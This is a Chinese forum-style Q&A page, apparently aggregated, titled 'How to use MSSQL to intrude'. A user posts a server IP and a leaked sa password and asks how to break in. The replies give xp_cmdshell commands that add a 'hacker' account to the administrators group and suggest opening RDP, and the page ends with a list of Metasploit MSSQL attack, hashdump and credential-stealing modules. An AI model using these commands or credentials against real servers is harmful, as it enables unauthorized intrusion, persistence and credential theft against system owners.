如何利用MSSQL入侵
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了如何利用MSSQL入侵相关的知识,希望对你有一定的参考价值。
我现在有个MSSQL的sa权限 并且有密码
可以连接上
如何利用这些资源直接入侵服务器 或者是网站呢
请高人指点
52.78.x.x
connServerName = "LZWEB"
connDatabase = "articleSQL"
connUserName = "sa"
connPassword = "1865windowsserver"
不行的
密码不对
2、用SQL连接工具连接IP52.78.x.x,用户名密码是你说的那些,然后执行如下SQL命令:1、exec master.dbo.xp_cmdshell 'net user hacker hacker /add'
2、exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
把hacker加入到管理员组. 参考技术A connPassword = "1865windowsserver" 参考技术B connUserName = "sa"
用户名=SA
connPassword = "1865windowsserver
密码="1865windowsserver
多学学英语吧哥们 摆在你面前 的SA权限都不会用
SA权限的话 就是系统权限了 执行CMD 加帐户 开了3389
登陆吧
msf中mssql扫描以及漏洞利用模块
auxiliary/admin/mssql/mssql_enum normal Microsoft SQL Server Configuration Enumerator
auxiliary/admin/mssql/mssql_enum_domain_accounts normal Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
auxiliary/admin/mssql/mssql_enum_sql_logins normal Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
auxiliary/admin/mssql/mssql_escalate_dbowner normal Microsoft SQL Server Escalate Db_Owner
auxiliary/admin/mssql/mssql_escalate_dbowner_sqli normal Microsoft SQL Server SQLi Escalate Db_Owner
auxiliary/admin/mssql/mssql_escalate_execute_as normal Microsoft SQL Server Escalate EXECUTE AS
auxiliary/admin/mssql/mssql_escalate_execute_as_sqli normal Microsoft SQL Server SQLi Escalate Execute AS
auxiliary/admin/mssql/mssql_exec normal Microsoft SQL Server xp_cmdshell Command Execution
auxiliary/admin/mssql/mssql_findandsampledata normal Microsoft SQL Server Find and Sample Data
auxiliary/admin/mssql/mssql_idf normal Microsoft SQL Server Interesting Data Finder
auxiliary/admin/mssql/mssql_ntlm_stealer normal Microsoft SQL Server NTLM Stealer
auxiliary/admin/mssql/mssql_ntlm_stealer_sqli normal Microsoft SQL Server SQLi NTLM Stealer
auxiliary/admin/mssql/mssql_sql normal Microsoft SQL Server Generic Query
auxiliary/admin/mssql/mssql_sql_file normal Microsoft SQL Server Generic Query from File
auxiliary/analyze/jtr_mssql_fast normal John the Ripper MS SQL Password Cracker (Fast Mode)
auxiliary/gather/lansweeper_collector normal Lansweeper Credential Collector
auxiliary/scanner/mssql/mssql_hashdump normal MSSQL Password Hashdump
auxiliary/scanner/mssql/mssql_login normal MSSQL Login Utility
auxiliary/scanner/mssql/mssql_ping normal MSSQL Ping Utility
auxiliary/scanner/mssql/mssql_schemadump normal MSSQL Schema Dump
auxiliary/server/capture/mssql normal Authentication Capture: MSSQL
exploit/windows/iis/msadc excellent MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution
exploit/windows/mssql/lyris_listmanager_weak_pass 2005-12-08 excellent Lyris ListManager MSDE Weak sa Password
exploit/windows/mssql/ms02_039_slammer 2002-07-24 good MS02-039 Microsoft SQL Server Resolution Overflow
exploit/windows/mssql/ms02_056_hello 2002-08-05 good MS02-056 Microsoft SQL Server Hello Overflow
exploit/windows/mssql/ms09_004_sp_replwritetovarbin 2008-12-09 good MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption
exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli 2008-12-09 excellent MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection
exploit/windows/mssql/mssql_clr_payload 1999-01-01 excellent Microsoft SQL Server Clr Stored Procedure Payload Execution
exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great Microsoft SQL Server Database Link Crawling Command Execution
exploit/windows/mssql/mssql_payload 2000-05-30 excellent Microsoft SQL Server Payload Execution
exploit/windows/mssql/mssql_payload_sqli 2000-05-30 excellent Microsoft SQL Server Payload Execution via SQL Injection
post/windows/gather/credentials/mssql_local_hashdump normal Windows Gather Local SQL Server Hash Dump
post/windows/manage/mssql_local_auth_bypass normal Windows Manage Local Microsoft SQL Server Authorization Bypass
以上是关于如何利用MSSQL入侵的主要内容,如果未能解决你的问题,请参考以下文章